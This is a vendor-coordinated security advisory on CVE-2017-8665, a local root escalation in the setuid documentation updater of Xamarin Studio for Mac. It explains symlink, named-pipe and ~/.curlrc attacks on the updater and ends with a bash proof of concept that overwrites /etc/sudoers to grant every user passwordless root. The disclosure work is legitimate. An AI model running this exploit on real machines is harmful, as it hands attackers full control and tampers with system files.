------------------------------------------------------------------------ Xamarin Studio for Mac API documentation update affected by local privilege escalation ------------------------------------------------------------------------ Yorick Koster, April 2017 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ Xamarin Studio is an Integrated Development Environment (IDE) used to create iOS, Mac and Android applications. Xamarin Studio supports developments in C# and F# (by default). The API documentation update mechanism of Xamarin Studio for Mac is installed as setuid root. This update mechanism contains several flaws that could be leveraged by a local attacker to gain elevated (root) privileges. ------------------------------------------------------------------------ See also ------------------------------------------------------------------------ - CVE-2017-8665 - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8665 ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully verified on Xamarin Studio for Mac version 6.2.1 (build 3) and version 6.3 (build 863). ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Microsoft released a new version of Xamarin.iOS that addresses this issue: https://support.microsoft.com/en-us/help/4037359 ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20170403/xamarin-studio-for-mac-api-documentation-update-affected-by-local-privilege-escalation.html Looking at the script, the first thing that probably stands out is the fact the script uses an insecure work directory. This directory is created under /tmp, the only 'random' part is the process identifier of the script. Since these identifiers are sequential it is not very hard for an attacker to predict what the folder name will be. It is even possible to pre-create all possible folder names (as symbolic links). The script performs very little error checking, if a certain step fails (eg, the target directory exists) the script usually continues executing the next command. TMPDIR=/tmp/ios-docs-download.$$ This folder is used for storing a number of .NET Assemblies (DLLs) that are later used by the mdoc application. If the folder ~/Library/Developer/Shared/Documentation/DocSets does not exist, the script will download a DMG file from internet, mount it and extract files from a PKG files that is located in the DMG file. Since the attacker can control the work directory it is (partially) possible to control where the files are extracted. Before the DMG is mounted and the files are extracted, the script first checks the MD5 digest of the DMG file against a hard coded value. This check can be circumvented using a named pipe. In this case the attacker can return the original DMG file when the MD5 check is done, and return a different one when it is mounted with hdiutil. Using symbolic links the attacker can control the mount root where the DMG file will be mounted, for example the DMG file can be mounted under /etc. The files located in the DMG file will appear in a folder under this mount root. # See if we have apple doc and if not get it if test -d $APPLE_DOCSET_PATH; then source=$APPLE_DOCSET_PATH else full_url=$BASE_URL/$FILE target_path=$TMPDIR/$FILE if test x$TMPDIR = x; then echo TMPDIR is invalid. exit 1 fi mkdir $TMPDIR curl -o $target_path $full_url #cp /tmp/ios-docs-download.4184/091-9917-A.dmg $target_path sum=`md5 -q $target_path` mount_path=$TMPDIR/mount tmp_unpack=$TMPDIR/unpack if test x$sum = x$EXPECTED; then mkdir $mount_path if hdiutil attach $target_path -mountroot $mount_path -nobrowse > $TMPDIR/output; then dir_path=`awk '$2 ~ /Apple_HFS/ { print $3}' $TMPDIR/output` pkgutil --expand $dir_path/iOSDocset.pkg $tmp_unpack cd $tmp_unpack bzip2 < Payload | cpio -dmiv A local attacker could in theory craft an attack that creates a folder at a particular location, which is used by another process running with elevated privileges. An example would be to mount the DMG at /etc/sudoers.d to add a sudo configuration that allows the local user to run a command as root without requiring a password. On most systems the /etc/sudoers.d is already present, in this case hdiutil will mount the DMG at another location (usually /etc/sudoers.d 2) preventing this particular attack scenario. Another approach for attacking this script is to look at the binaries it uses. Often these binaries have their own set of environment variables and or configuration files they use. In case of setuid root binaries the environment is partly controllable by the user calling the binary. One of the binaries used is curl that supports a number of environment variables. In addition, it checks whether a configuration file is present in ~/.curlrc. In our case it will check the home folder of the user running apple-doc-wizard. Consequently, the curl configuration file is fully controllable by the local attacker. Exploiting this issue is very trivial, using the url and output configuration options it is possible to download a file from any URL and store it in any arbitrary location. Since curl is run as root, it is possible to overwrite or create any local file. The following proof of concept can be used to demonstrate this issue: #!/bin/bash # WARNING: this scripts overwrites ~/.curlrc and /private/etc/sudoers (when successful) #target=/Library/Frameworks/Xamarin.iOS.framework/Versions/10.6.0.10/share/doc/MonoTouch/apple-doc-wizard target=/Library/Frameworks/Xamarin.iOS.framework/Versions/10.8.0.175/share/doc/MonoTouch/apple-doc-wizard rm -rf ~/Library/Developer/Shared/Documentation/DocSets cat << __EOF > /private/tmp/sudoers %everyone ALL=(ALL) NOPASSWD: ALL __EOF cat << __EOF > ~/.curlrc url=file:///private/tmp/sudoers output=/private/etc/sudoers __EOF echo echo "*** press CRL+C when the download starts ***" $target echo sudo -- sh -c 'rm -rf /private/tmp/ios-docs-download.*; su -' rm -f /private/tmp/sudoers ~/.curlrc